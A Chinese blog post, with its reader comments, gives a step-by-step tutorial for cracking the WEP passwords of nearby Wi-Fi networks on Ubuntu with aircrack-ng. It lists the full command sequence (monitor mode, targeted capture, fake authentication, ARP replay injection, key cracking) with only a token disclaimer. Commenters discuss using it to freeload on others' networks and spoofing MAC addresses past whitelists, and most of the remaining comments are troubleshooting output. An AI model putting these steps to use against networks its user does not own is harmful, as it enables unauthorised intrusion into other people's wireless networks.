Ubuntu 无线密码破解利器aircrack-ng
想必搞过破解的朋友们都会知道bt3 bt4等linux下的无线破解工具吧,在ubuntu系统下同样有着一款破解功能强大的工具,那就是aircrack-ng。放这篇文章出来只是做技术上的交流,奶牛可不希望谁用这个做坏事儿哦~~~嘿嘿,破解开始咯:
测试平台 Y450 T6600 2.1G ubuntu 10.04 成功
1.下载安装aircrack-ng,奶牛直接从源中安装的。
sudo apt-get install aircrack-ng
2.启动无线,这里奶牛需要说明一下,很多朋友的无线可能在windows系统中是禁用或者是系统自带的电源管理系统中未开启无线的,这种情况下需要先在win状态下开启之后才能在ubuntu中开启无线。开启完成后进入ubuntu ,开一个终端,ifconfig -a看看wlan是否开启,开启正常可进行下一步。
3.准备工作完成,开始破解。开启终端①,
sudo airmon-ng start wlan0 sudo airodump-ng mon0
这时会看到无线的地址出现在屏幕上,这里有显示它们的mac地址以及所在频道。ok,ctrl+c退出,在这里我们选择类型为wep的无线为破解对象。我们需要记录它所在的频道以及mac地址。
4.开启终端②
sudo airodump-ng --channel 频道 --bssid 目标主机mac地址 -w wep mon0
这里的wep为默认的存包文件的名字,可以更改。
5.开启终端③
sudo aireplay-ng -1 0 -a 目标mac -h 本机MAC地址 mon0
(本机的mac可以开启一个新的终端用ifconfig -a来查询)
这时会有成功字样显示,如果没有显示可能就是目标不支持或者系统部稳定,需要更换目标了。显示成功后进行下步。
6.继续输入
sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b 目标MAC地址 -h 本机MAC地址 mon0
此时终端②中的数据会增长很快,当数据到达5000的时候就可以破解了。
7.开启终端 ④
sudo aircrack-ng wep*.cap
这时就开始破解了,如果你进行过多组,可能会有多组结果,你可以用数字123进行选择,如果不出意外你已经破解出来这组无线的密码了。
8.最后 结束监控过程
sudo airmon-ng stop mon0
( sudo airomon-ng check可以查看你开启了多少监控,如果运行多组的时候可以查看后选择关闭)。
本文链接地址: Ubuntu 无线密码破解利器aircrack-ng
原创文章,转载请注明: 转载自奶牛博客
哦。。。。
继蹭吃蹭喝之后,蹭网将成为另一种民间文化
呵呵,我们这里比较落后,校园里的无线还都是自己的有线宽带连接的无线路由,如果wifi都遍布了,那么宽带业务就可以退市咯~~~吼吼
个人一直有个小疑问,既然这个程序aircrack-ng可以盗取别人的无线网络,那是不是这个程序的开发者可以在安装aircrack-ng的用户电脑里面设置一个backdoor。从此,每当用户上网时就被这个开发者无声无息中监控诸如此类的……这个纯属是个人YY的了,因为有点做贼心虚是中国传统美德的一种了
呵呵,这个初衷都是为了网络安全,做测试用,而且只支持wep滴,wpa滴就很难破解咯~~~
原来是这样子,因为我是学生物的…对于电脑神马的纯兴趣爱好了…故贻笑大方了,:-)
sudo airmon-ng start wlan0
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
830 NetworkManager
835 avahi-daemon
837 avahi-daemon
868 wpa_supplicant
4017 dhclient
Interface Chipset Driver
eth1 Unknown wl
不会弄阿~
你的无线打开了么?ifconfig -a看看有wlan启用没?可能是没启用,那五个进程不用管,不影响的。
没有看到wlan阿…
ifconfig -a
eth0 Link encap:以太网 硬件地址 00:21:70:ed:34:cc
inet 地址:192.168.0.2 广播:192.168.0.255 掩码:255.255.255.0
inet6 地址: fe80::221:70ff:feed:34cc/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 跃点数:1
接收数据包:545105 错误:0 丢弃:0 过载:0 帧数:0
发送数据包:520256 错误:0 丢弃:0 过载:0 载波:0
碰撞:0 发送队列长度:1000
接收字节:408732563 (408.7 MB) 发送字节:269838691 (269.8 MB)
中断:17
eth1 Link encap:以太网 硬件地址 00:23:08:68:b1:a9
inet6 地址: fe80::223:8ff:fe68:b1a9/64 Scope:Link
UP BROADCAST MTU:1500 跃点数:1
接收数据包:0 错误:0 丢弃:0 过载:0 帧数:0
发送数据包:0 错误:0 丢弃:0 过载:0 载波:0
碰撞:0 发送队列长度:1000
接收字节:0 (0.0 B) 发送字节:0 (0.0 B)
中断:17
lo Link encap:本地环回
inet 地址:127.0.0.1 掩码:255.0.0.0
inet6 地址: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 跃点数:1
接收数据包:356045 错误:0 丢弃:0 过载:0 帧数:0
发送数据包:356045 错误:0 丢弃:0 过载:0 载波:0
碰撞:0 发送队列长度:0
接收字节:66342119 (66.3 MB) 发送字节:66342119 (66.3 MB)
teredo Link encap:未指定 硬件地址 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet6 地址: fe80::ffff:ffff:ffff/64 Scope:Link
inet6 地址: 2001:0:53aa:64c:384f:282d:88cf:cbfd/32 Scope:Global
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1280 跃点数:1
接收数据包:12733 错误:0 丢弃:0 过载:0 帧数:0
发送数据包:11696 错误:0 丢弃:0 过载:0 载波:0
碰撞:0 发送队列长度:500
接收字节:10662832 (10.6 MB) 发送字节:2519139 (2.5 MB)
貌似这没看回复邮件通知
没有wlan设备丫,默认是有个wlan0的,你的没开启丫,你看看是不是在win下禁用了没开启~~小站刚开,还在完善中丫~~~邮件通知会尽快开启的~~
wlan0是无线吗?
我点右上角那个可以链接无线的阿
那这样,你打开系统——系统管理——网络工具,里面会显示你的网卡的,把无线网卡的名称记录下来,那个就wlan,只是显示的别的名称而已,然后所有的wlan0就都用那个名称替代应该就可以啦~
打开网络工具后
有2个以太网卡 eth0和eth1
—————————————-
sudo airmon-ng start eth1
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
830 NetworkManager
835 avahi-daemon
837 avahi-daemon
868 wpa_supplicant
4017 dhclient
Interface Chipset Driver
eth1 Unknown wl (monitor mode enabled)
sudo airodump-ng mon0
Interface mon0:
ioctl(SIOCGIFINDEX) failed: No such device
还是不行阿
你最终搞定了没有?我的情况和你完全是一样的,eth0和eth1和一个lo……
sudo airodump -ng mon0
sudo: airodump: command not found
谢谢lynn的提醒,应该是sudo airodump-ng mon0,多了一个小空格,文章已经更正~~~
sigh….弄到最后说破解不成功呢….
提示让我再试5000次,我那个破解数已经达到2W了…
呃,貌似不能保证百分百的成功,也有可能是协议的关系,貌似那个程序只能crack wep加密方式
aircrack-ng 真的不错吗?虽然家里附近没无线网络,
但还想试下该软件,人太懒,博主文章提供下载链接会更好
这个是在ubuntu系统下的,连网更新很方便的说~~~
你好,第二部中怎么看wlan打开呢,是不是能无线上网就表示打开了呢
你可以看看自己的网络工具啊,那个可以查看网卡信息的。
请教:执行到下面就出问题了,看了英文说明,好像要补丁,
sudo aireplay-ng -1 0 -a APMAC -h MYMAC mon0
Waiting for beacon frame (BSSID:APMAC) on channel -1
mon0 is on channel -1, but the AP uses channel 6
这个如何解决?谢谢!
你的频道没有绑定正确哦,你要破解的频道在6上,你却绑定的1,所以出错咯~~~
请问下啊…我也是有同样的问题,但是修改过了频道之后还是出现同样的错误信息..咋改
你好,我查看了我的网卡有两个,一个eth0还有一个lo,但是运行sudo airmon-ng start eth1和sudo airmon-ng start lo,都不行。出现的情况跟Auston Jary这位朋友的情况一致,sudo airmon-ng start eth1
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
830 NetworkManager
835 avahi-daemon
837 avahi-daemon
868 wpa_supplicant
4017 dhclient
Interface Chipset Driver
eth1 Unknown wl (monitor mode enabled)
sudo airodump-ng mon0
Interface mon0:
ioctl(SIOCGIFINDEX) failed: No such device
当然当中的数值不太一样,但是大致情况也是这样,请问为啥会出现这样的情况呢
可能是硬件的问题吧,当时auston jary也木有解决~~
看了还是不会,大大 能不能做个视屏,人家初学linux的说
奶牛现在周围没有无线环境的说,等有机会我就做个视频给大家看哈~~~还有谢谢gemini的支持哈
Starting PTW attack with 135 ivs,怎么只有135就开始破解了,而且一直都是失败的?
要到5000+才能开始吧,需要看第二个终端中数据包的个数~~~~
sudo airodump-ng –chanel 1 –bssid 目标主机mac -w wep mon0后
出现这个 CH 1 ][ Elapsed: 36 s ][ 2010-10-04 13:55 ][ fixed channel mon0: 13
然后就是#18类似的问题了,这个fixed channel mon0: 13 是怎么回事呢
是不是频道更换了,呃,那个无线换频道了?呃,奶牛也不是很了解的说~~~
即使廣播,但在無限路由的內置程序裏設置網卡mac地址白名單,就結束一切了吧
嗯,可以的,如果有白名单就没有问题了,不过如果mac泄漏了也还是可以通过伪造mac地址来进行入侵的,有个macchanger的工具可以伪造mac地址~~~
你好,这个怎么理解呢?
sudo airodump-ng –chanel 频道 –bssid 目标主机mac -w wep mon0
channel是频道,就是第一步的时候扫描出来的,bssid后面加目标的mac硬件地址 ,类型是wep ~~~
非常讨厌无线盗网,因为我家就用路由器=-=~
请问这是什么意思啊?
我安装失败了吗?
gabby@ubuntu:~$ sudo apt-get install aircrack-ng
正在读取软件包列表… 完成
正在分析软件包的依赖关系树
正在读取状态信息… 完成
aircrack-ng 已经是最新的版本了。
升级了 0 个软件包,新安装了 0 个软件包,要卸载 0 个软件包,有 241 个软件包未被升级。
有 1 个软件包没有被完全安装或卸载。
解压缩后会消耗掉 0B 的额外空间。
您希望继续执行吗?[Y/n]y
正在设置 kismet (2011.01.1) …
usermod: user ‘k’ does not exist
dpkg:处理 kismet (–configure)时出错:
子进程 已安装 post-installation 脚本 返回了错误号 6
在处理时有错误发生:
kismet
E: Sub-process /usr/bin/dpkg returned an error code (1)
gabby@ubuntu:~$ ^C
gabby@ubuntu:~$
还有请问一下
sudo airodump-ng –chanel 频道 –bssid 目标主机mac -w wep mon0
其中的bssid要去掉、
然后写上 目标BSSID的名称吗?
比如说如果目标网络的名称是 hahaha,
channel是6,
mac是1:2:3
那么我要写
sudo airodump-ng –chanel 6 –hahaha 1:2:3 -w wep mon0
还是写
sudo airodump-ng –chanel 6 –bssid 1:2:3 -w wep mon0
?
还是怎么样呢
顺便说一下,好像你的chanel 拼错了,应该是channel 吧
谢谢
奶牛 你好
请教一下
输入
sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b 目标MAC地址 -h 本机MAC地址 mon0
之后
我的数据已经升到5000多了
然后再开另外一个终端,输入sudo aircrack-ng wep*.cap之后
它说找不到数据包
怎么办呢 是哪里出错了呢
有可能是数据包数目不够,或者对方的无线路由没有客户链接,所以没有得到数据包。而且这个文章是针对wep的无线路由哦~~~
sudo aireplay-ng -1 0 -a 目标MAC -h 自己的MAC mon0
Waiting for beacon frame (BSSID:APMAC) on channel -1
mon0 is on channel -1, but the AP uses channel 1
这个如何解决?谢谢!我不知道怎么 改呀,可以教下我吗?
CH 1 ][ Elapsed: 28 s ][ 2011-07-07 15:43 ][ fixed channel mon0: -1
BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
F4:EC:38:5F:26:12 -90 100 228 106 2 1 54e. WPA WEP TP-LINK
BSSID STATION PWR Rate Lost Packets Probes
F4:EC:38:5F:26:12 FE:FF:FF:FF:FF:FF -1 11 - 0 0 1
F4:EC:38:5F:26:12 E4:FF:FF:FF:FF:FF -1 11 - 0 0 1
F4:EC:38:5F:26:12 00:17:C4:8C:8F:22 -76 0 -36e 6 43
F4:EC:38:5F:26:12 00:16:EA:DB:1C:3A -78 0 - 1e 0 43
F4:EC:38:5F:26:12 F4:EC:38:5F:96:41 -90 0 -11 0 1
F4:EC:38:5F:26:12 F5:EC:38:5F:26:12 -92 0 - 1 0 1
就是这样就是-1
这是新内核的问题,建议用老版本ubuntu或者降级内核~~~
acer@acer-Aspire-5742G:~$ sudo airmon-ng start eth1
Found 5 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
1271 avahi-daemon
1272 avahi-daemon
1334 NetworkManager
1548 wpa_supplicant
4725 dhclient
Process with PID 4725 (dhclient) is running on interface eth1
Interface Chipset Driver
eth1 Unknown wl (monitor mode enabled)
救命啊,到这就不会了。。。
然后输 acer@acer-Aspire-5742G:~$ sudo airodump-ng mon0
显示这个:
Interface mon0:
ioctl(SIOCGIFINDEX) failed: No such device
帮个忙吧,谢谢了
你这不是原创的吧
你觉得呢?软件不是我写的,第一个这样做的人也肯定不是我,我只是参考了一些教程,然后自己测试过,最后整理出来的。
密码在哪儿显示?
我想知道破解出来的密码在哪儿能看到,标志是什么?谢谢!
我操作完后我不知道如何看到密码?能详细点嘛?非常感谢!